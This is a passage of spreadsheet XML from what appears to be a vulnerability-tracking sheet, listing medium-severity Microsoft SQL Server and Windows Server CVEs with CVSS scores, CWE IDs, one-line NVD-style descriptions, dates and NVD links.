t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1080" s="5" t="inlineStr" /><c r="R1080" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1080" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1080" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67386</t></is></c></row><row r="1081"><c r="A1081" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1081" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1081" s="5" t="inlineStr"><is><t>CVE-2026-67389</t></is></c><c r="D1081" s="5" t="n"><v>6.5</v></c><c r="E1081" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1081" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1081" s="5" t="inlineStr" /><c r="H1081" s="5" t="n"><v>0.007</v></c><c r="I1081" s="5" t="inlineStr" /><c r="J1081" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1081" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1081" s="5" t="inlineStr" /><c r="M1081" s="5" t="inlineStr" /><c r="N1081" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1081" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1081" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1081" s="5" t="inlineStr" /><c r="R1081" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1081" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1081" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67389</t></is></c></row><row r="1082"><c r="A1082" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1082" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1082" s="5" t="inlineStr"><is><t>CVE-2026-67390</t></is></c><c r="D1082" s="5" t="n"><v>6.5</v></c><c r="E1082" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1082" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1082" s="5" t="inlineStr" /><c r="H1082" s="5" t="n"><v>0.01</v></c><c r="I1082" s="5" t="inlineStr" /><c r="J1082" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1082" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1082" s="5" t="inlineStr" /><c r="M1082" s="5" t="inlineStr" /><c r="N1082" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1082" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1082" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1082" s="5" t="inlineStr" /><c r="R1082" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1082" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1082" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67390</t></is></c></row><row r="1083"><c r="A1083" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1083" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1083" s="5" t="inlineStr"><is><t>CVE-2026-67393</t></is></c><c r="D1083" s="5" t="n"><v>6.5</v></c><c r="E1083" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1083" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1083" s="5" t="inlineStr" /><c r="H1083" s="5" t="n"><v>0.007</v></c><c r="I1083" s="5" t="inlineStr" /><c r="J1083" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1083" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1083" s="5" t="inlineStr" /><c r="M1083" s="5" t="inlineStr" /><c r="N1083" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1083" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1083" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1083" s="5" t="inlineStr" /><c r="R1083" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1083" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1083" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67393</t></is></c></row><row r="1084"><c r="A1084" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1084" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1084" s="5" t="inlineStr"><is><t>CVE-2026-67624</t></is></c><c r="D1084" s="5" t="n"><v>6.5</v></c><c r="E1084" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1084" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1084" s="5" t="inlineStr" /><c r="H1084" s="5" t="n"><v>0.006</v></c><c r="I1084" s="5" t="inlineStr" /><c r="J1084" s="5" t="inlineStr" /><c r="K1084" s="5" t="inlineStr" /><c r="L1084" s="5" t="inlineStr" /><c r="M1084" s="5" t="inlineStr" /><c r="N1084" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1084" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1084" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1084" s="5" t="inlineStr" /><c r="R1084" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1084" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1084" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67624</t></is></c></row><row r="1085"><c r="A1085" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1085" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1085" s="5" t="inlineStr"><is><t>CVE-2026-67629</t></is></c><c r="D1085" s="5" t="n"><v>6.5</v></c><c r="E1085" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1085" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1085" s="5" t="inlineStr" /><c r="H1085" s="5" t="n"><v>0.007</v></c><c r="I1085" s="5" t="inlineStr" /><c r="J1085" s="5" t="inlineStr" /><c r="K1085" s="5" t="inlineStr" /><c r="L1085" s="5" t="inlineStr" /><c r="M1085" s="5" t="inlineStr" /><c r="N1085" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1085" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1085" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1085" s="5" t="inlineStr" /><c r="R1085" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1085" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1085" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67629</t></is></c></row><row r="1086"><c r="A1086" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1086" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1086" s="5" t="inlineStr"><is><t>CVE-2026-67630</t></is></c><c r="D1086" s="5" t="n"><v>6.5</v></c><c r="E1086" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1086" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1086" s="5" t="inlineStr" /><c r="H1086" s="5" t="n"><v>0.007</v></c><c r="I1086" s="5" t="inlineStr" /><c r="J1086" s="5" t="inlineStr" /><c r="K1086" s="5" t="inlineStr" /><c r="L1086" s="5" t="inlineStr" /><c r="M1086" s="5" t="inlineStr" /><c r="N1086" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1086" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1086" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1086" s="5" t="inlineStr" /><c r="R1086" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1086" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1086" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67630</t></is></c></row><row r="1087"><c r="A1087" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1087" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1087" s="5" t="inlineStr"><is><t>CVE-2026-67633</t></is></c><c r="D1087" s="5" t="n"><v>6.5</v></c><c r="E1087" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1087" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1087" s="5" t="inlineStr" /><c r="H1087" s="5" t="n"><v>0.008</v></c><c r="I1087" s="5" t="inlineStr" /><c r="J1087" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1087" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1087" s="5" t="inlineStr" /><c r="M1087" s="5" t="inlineStr" /><c r="N1087" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1087" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1087" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1087" s="5" t="inlineStr" /><c r="R1087" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1087" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1087" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67633</t></is></c></row><row r="1088"><c r="A1088" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1088" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1088" s="5" t="inlineStr"><is><t>CVE-2026-67641</t></is></c><c r="D1088" s="5" t="n"><v>6.5</v></c><c r="E1088" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1088" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1088" s="5" t="inlineStr" /><c r="H1088" s="5" t="n"><v>0.006</v></c><c r="I1088" s="5" t="inlineStr" /><c r="J1088" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1088" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1088" s="5" t="inlineStr" /><c r="M1088" s="5" t="inlineStr" /><c r="N1088" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1088" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1088" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1088" s="5" t="inlineStr" /><c r="R1088" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S1088" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1088" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67641</t></is></c></row><row r="1089"><c r="A1089" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1089" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1089" s="5" t="inlineStr"><is><t>CVE-2026-67645</t></is></c><c r="D1089" s="5" t="n"><v>6.5</v></c><c r="E1089" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1089" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1089" s="5" t="inlineStr" /><c r="H1089" s="5" t="n"><v>0.006</v></c><c r="I1089" s="5" t="inlineStr" /><c r="J1089" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1089" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1089" s="5" t="inlineStr" /><c r="M1089" s="5" t="inlineStr" /><c r="N1089" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1089" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1089" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1089" s="5" t="inlineStr" /><c r="R1089" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1089" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1089" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67645</t></is></c></row><row r="1090"><c r="A1090" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1090" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1090" s="5" t="inlineStr"><is><t>CVE-2026-67648</t></is></c><c r="D1090" s="5" t="n"><v>6.5</v></c><c r="E1090" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1090" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1090" s="5" t="inlineStr" /><c r="H1090" s="5" t="n"><v>0.006</v></c><c r="I1090" s="5" t="inlineStr" /><c r="J1090" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1090" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1090" s="5" t="inlineStr" /><c r="M1090" s="5" t="inlineStr" /><c r="N1090" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1090" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1090" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1090" s="5" t="inlineStr" /><c r="R1090" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1090" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1090" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67648</t></is></c></row><row r="1091"><c r="A1091" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1091" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1091" s="5" t="inlineStr"><is><t>CVE-2026-68776</t></is></c><c r="D1091" s="5" t="n"><v>6.5</v></c><c r="E1091" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1091" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1091" s="5" t="inlineStr" /><c r="H1091" s="5" t="n"><v>0.006</v></c><c r="I1091" s="5" t="inlineStr" /><c r="J1091" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1091" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1091" s="5" t="inlineStr" /><c r="M1091" s="5" t="inlineStr" /><c r="N1091" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1091" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1091" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1091" s="5" t="inlineStr" /><c r="R1091" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1091" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1091" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68776</t></is></c></row><row r="1092"><c r="A1092" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1092" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1092" s="5" t="inlineStr"><is><t>CVE-2026-68777</t></is></c><c r="D1092" s="5" t="n"><v>6.5</v></c><c r="E1092" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1092" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1092" s="5" t="inlineStr" /><c r="H1092" s="5" t="n"><v>0.007</v></c><c r="I1092" s="5" t="inlineStr" /><c r="J1092" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1092" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1092" s="5" t="inlineStr" /><c r="M1092" s="5" t="inlineStr" /><c r="N1092" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1092" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1092" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1092" s="5" t="inlineStr" /><c r="R1092" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1092" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1092" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68777</t></is></c></row><row r="1093"><c r="A1093" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1093" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1093" s="5" t="inlineStr"><is><t>CVE-2026-68778</t></is></c><c r="D1093" s="5" t="n"><v>6.5</v></c><c r="E1093" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1093" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1093" s="5" t="inlineStr" /><c r="H1093" s="5" t="n"><v>0.007</v></c><c r="I1093" s="5" t="inlineStr" /><c r="J1093" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1093" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1093" s="5" t="inlineStr" /><c r="M1093" s="5" t="inlineStr" /><c r="N1093" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1093" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1093" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1093" s="5" t="inlineStr" /><c r="R1093" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1093" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1093" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68778</t></is></c></row><row r="1094"><c r="A1094" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1094" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1094" s="5" t="inlineStr"><is><t>CVE-2026-68779</t></is></c><c r="D1094" s="5" t="n"><v>6.5</v></c><c r="E1094" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1094" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1094" s="5" t="inlineStr" /><c r="H1094" s="5" t="n"><v>0.006</v></c><c r="I1094" s="5" t="inlineStr" /><c r="J1094" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1094" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1094" s="5" t="inlineStr" /><c r="M1094" s="5" t="inlineStr" /><c r="N1094" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1094" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1094" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1094" s="5" t="inlineStr" /><c r="R1094" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1094" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1094" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68779</t></is></c></row><row r="1095"><c r="A1095" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1095" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1095" s="5" t="inlineStr"><is><t>CVE-2026-68780</t></is></c><c r="D1095" s="5" t="n"><v>6.5</v></c><c r="E1095" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1095" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1095" s="5" t="inlineStr" /><c r="H1095" s="5" t="n"><v>0.007</v></c><c r="I1095" s="5" t="inlineStr" /><c r="J1095" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1095" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1095" s="5" t="inlineStr" /><c r="M1095" s="5" t="inlineStr" /><c r="N1095" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1095" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1095" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1095" s="5" t="inlineStr" /><c r="R1095" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1095" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1095" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68780</t></is></c></row><row r="1096"><c r="A1096" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1096" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1096" s="5" t="inlineStr"><is><t>CVE-2026-68781</t></is></c><c r="D1096" s="5" t="n"><v>6.5</v></c><c r="E1096" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1096" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1096" s="5" t="inlineStr" /><c r="H1096" s="5" t="n"><v>0.007</v></c><c r="I1096" s="5" t="inlineStr" /><c r="J1096" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1096" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1096" s="5" t="inlineStr" /><c r="M1096" s="5" t="inlineStr" /><c r="N1096" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1096" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1096" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1096" s="5" t="inlineStr" /><c r="R1096" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1096" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1096" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68781</t></is></c></row><row r="1097"><c r="A1097" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1097" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1097" s="5" t="inlineStr"><is><t>CVE-2026-68784</t></is></c><c r="D1097" s="5" t="n"><v>6.5</v></c><c r="E1097" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1097" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1097" s="5" t="inlineStr" /><c r="H1097" s="5" t="n"><v>0.007</v></c><c r="I1097" s="5" t="inlineStr" /><c r="J1097" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1097" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1097" s="5" t="inlineStr" /><c r="M1097" s="5" t="inlineStr" /><c r="N1097" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1097" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1097" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1097" s="5" t="inlineStr" /><c r="R1097" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1097" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1097" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68784</t></is></c></row><row r="1098"><c r="A1098" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1098" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1098" s="5" t="inlineStr"><is><t>CVE-2026-68898</t></is></c><c r="D1098" s="5" t="n"><v>6.5</v></c><c r="E1098" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1098" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1098" s="5" t="inlineStr" /><c r="H1098" s="5" t="n"><v>0.006</v></c><c r="I1098" s="5" t="inlineStr" /><c r="J1098" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K109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098" s="5" t="inlineStr" /><c r="M1098" s="5" t="inlineStr" /><c r="N1098" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1098" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1098" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1098" s="5" t="inlineStr" /><c r="R1098" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1098" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows iSCSI allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1098" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68898</t></is></c></row><row r="1099"><c r="A1099" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1099" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1099" s="5" t="inlineStr"><is><t>CVE-2026-69267</t></is></c><c r="D1099" s="5" t="n"><v>6.5</v></c><c r="E1099" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1099" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1099" s="5" t="inlineStr" /><c r="H1099" s="5" t="n"><v>0.003</v></c><c r="I1099" s="5" t="inlineStr" /><c r="J1099" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1099"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099" s="5" t="inlineStr" /><c r="M1099" s="5" t="inlineStr" /><c r="N1099" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1099" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1099" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1099" s="5" t="inlineStr" /><c r="R1099" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S1099" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in Windows Connected User Experiences and Telemetry allows an authorized attacker to disclose information locally.</t></is></c><c r="T1099" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69267</t></is></c></row><row r="1100"><c r="A1100" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1100" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1100" s="5" t="inlineStr"><is><t>CVE-2026-69297</t></is></c><c r="D1100" s="5" t="n"><v>6.5</v></c><c r="E1100" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1100" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1100" s="5" t="inlineStr" /><c r="H1100" s="5" t="n"><v>0.006</v></c><c r="I1100" s="5" t="inlineStr" /><c r="J1100" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1100" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1100" s="5" t="inlineStr" /><c r="M1100" s="5" t="inlineStr" /><c r="N1100" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1100" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1100" s="5" t="inlineStr" /><c r="R1100" s="5" t="inlineStr"><is><t>CWE-257</t></is></c><c r="S1100" s="5" t="inlineStr"><is><t>Storing passwords in a recoverable format in Windows DHCP Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1100" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69297</t></is></c></row><row r="1101"><c r="A1101" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1101" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1101" s="5" t="inlineStr"><is><t>CVE-2026-69361</t></is></c><c r="D1101" s="5" t="n"><v>6.5</v></c><c r="E1101" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1101" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1101" s="5" 